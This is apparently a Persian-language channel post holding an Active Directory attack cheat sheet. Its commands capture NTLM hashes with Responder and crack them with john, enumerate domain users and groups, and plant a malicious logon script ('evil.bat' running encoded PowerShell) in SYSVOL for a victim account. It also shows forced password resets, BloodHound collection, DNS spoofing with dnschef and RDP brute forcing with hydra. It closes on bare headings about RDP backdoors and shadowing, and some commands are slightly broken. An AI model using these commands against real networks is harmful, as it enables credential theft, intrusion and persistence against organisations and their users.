Post #179
1.52K
وطنم بوی غربت میده...
- ❤ 20
- 👎 5
- 👍 2
- 😭 1
Showing posts older than #181 · Back to latest
john smith -> jsmith, j.smith, john.smith
michael pole -> mpole, m.pole, michael.pole
ssh dc.example.com\\<ad_username>@sub.dc.example.com
# /netonly: تمام ارتباطات شبکهای از این اعتبارنامههای تزریقشده برای احراز هویت استفاده میکنند.
runas.exe /netonly /user:<domain>\<username> cmd.exe
PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
nslookup dc.example.com
تفویض اختیار (Delegation)
در Active Directory، مدیر سیستم میتواند بدون اعطای دسترسیهای کامل مدیریتی، مدیریت کاربران را در یک Organizational Unit (OU) به کاربر دیگری واگذار کند.
راهاندازی
ابزار Active Directory Users and Computers را باز کنید.
روی OU موردنظر راستکلیک کرده و گزینه Delegate Control… را انتخاب کنید.
در پنجره بازشده، نام کاربری را که میخواهید اختیار مدیریت به او واگذار شود وارد کنید.
وظایفی را که کاربر Delegationشده مجاز به انجام آنهاست انتخاب کنید.
روی OK کلیک کنید.
مدیریت کاربران (Manage Users)
با کاربر Delegation شده وارد سیستم شوید.
Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
sudo responder -I <interface-like-eth0>
echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt
# فهرست تمام کاربران
net user /domain
net user <username> /domain
Get-ADUser -Filter *
Get-ADUser -Identity <username> -Server dc.example.com -Properties *
Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A
# فهرست تمام گروهها
net group /domain
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com
# نمایش سیاست رمز عبور
net accounts /domain
# لیست Object Active Directory
$ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com
# دریافت اطلاعات مربوط به دامنه مشخصشده
Get-ADDomain -Server dc.example.com
# تغییر رمز عبور کاربر Active Directory
Set-ADAccountPassword -Identity <username> -Server dc.example.com -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)
# SYSVOL - یک پوشه اشتراکی که Group Policy Objects (GPOs) را ذخیره میکند.
dir \\dc.example.com\SYSVOL\
# 1. Check the permission
icacls C:\Windows\SYSVOL\sysvol\example.local\scripts\
# 2. Modify/Add a malicious script
'powershell -e <BASE64_COMMAND>' | OutFile -FilePath C:\Windows\SYSVOL\sysvol\example.local\scripts\evil.bat
# 3. Set logon script for the specified user
Set-ADUser -Identity VictimUser -ScriptPath '\\example.local\SYSVOL\example.local\scripts\evil.bat
-U:
اعتبارنامه کاربری که مجوز تغییر رمز عبور کاربر دیگر را دارد
-I:
آدرس IP تارگت
-S:
نام سرور تارگت
net rpc password "TargetUserName" "myPassw0rd@123" -U "UserName"%"Password" -I "10.0.0.1" -S "EXAMPLE.LOCAL"
روی آیکون ویندوز راستکلیک کنید.
روی Run کلیک کرده و عبارت mmc را وارد کنید، سپس OK را بزنید.
در پنجره MMC، روی File → Add or Remove Snap-ins کلیک کنید.
هر سه Snap-in مربوط به Active Directory را اضافه کنید.
در پنل سمت چپ، روی Active Directory… راستکلیک کرده و گزینه Change Forest را انتخاب کنید.
نام دامنه را بهعنوان Root domain وارد کرده و روی OK کلیک کنید.
از منوی بالا روی View → Advanced Features کلیک کنید.
netexec ldap <target-ip> -d example.local -u username -p password --dns-server <target-ip> --bloodhound -c All
python3 -m venv .venv
source .venv/bin/activate
pipx install bloodhound # یا بهجای 'pipx' از 'pip3' استفاده کنید
bloodhound-python -h
# -d: دامنه (Domain)
# -u: نام کاربری (Username)
# -p: رمز عبور (Password)
# -dc: دامین کنترلر (Domain Controller)
# -c all: جمعآوری تمام دادهها
# -ns: تعیین nameserver جایگزین
bloodhound-python -d example.local -u username -p password -dc dc.example.local -c all -ns ns.example.local
#اگر نتوانستیم دامنه را resolve کنیم، میتوانیم از dnschef برای ساخت یک DNS جعلی بهصورت پراکسی استفاده کنیم:
sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>
dig @<target-ip> example.local ANY
gobuster dns -d example.local -w subdomains.txt -t 25
curl -L https://ghst.ly/getbhce > docker-compose.yml
sudo docker-compose down -v # اگر میخواهید پسورد BloodHound را ریست کنید
sudo docker-compose pull && sudo docker-compose up
http://localhost:8080
export BLOODHOUND_HOST=10.0.0.1
export BLOODHOUND_PORT=8090
nmap --script rdp-enum-encryption -p 3389 <target-ip>
nmap --script rdp-ntlm-info -p 3389 <target-ip>
nmap --script rdp* -p 3389 <target-ip>
hydra -l username -P passwords.txt <target-ip> rdp
hydra -L usernames.txt -p password <target-ip> rdp
# -c: Connect given URI or file
remmina -c rdp://username@vulnerable.com
remmina -c rdp://domain\\username@vulnerable.com
remmina -c rdp://username:password@vulnerable.com
# ---------------------------------------------------------------------------------
# Settings
# Keyboard mapping
1. On Remmina client window, click menu icon and move to "Preferences".
2. Navigate to "RDP" tab and check "Use client keyboard mapping".
3. Reboot Remmina
xfreerdp /u:username /v:10.0.0.1:3389
xfreerdp /u:username /p:password /cert:ignore /v:10.0.0.1 /workarea
# Create a shared drive (/drive:LOCAL_DIR,SHARE_NAME)
xfreerdp /u:username /p:password /drive:.,share /v:10.0.0.1
# Useful command for exploiting
xfreerdp /v:10.0.0.1 /u:username /p:password +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
# --------------------------------------------------------------------------------
# On remote Windows
# Access share directory in Command Prompt or PowerShell
\\tsclient\\~share\
rdesktop -u username -p password 10.0.0.1:3389

RDP بکدور
RDP Shadowing
فعالسازی Shadowing RDP
شمارش کاربران فعال
استفاده از shadow mode
سناریوی حمله کامل




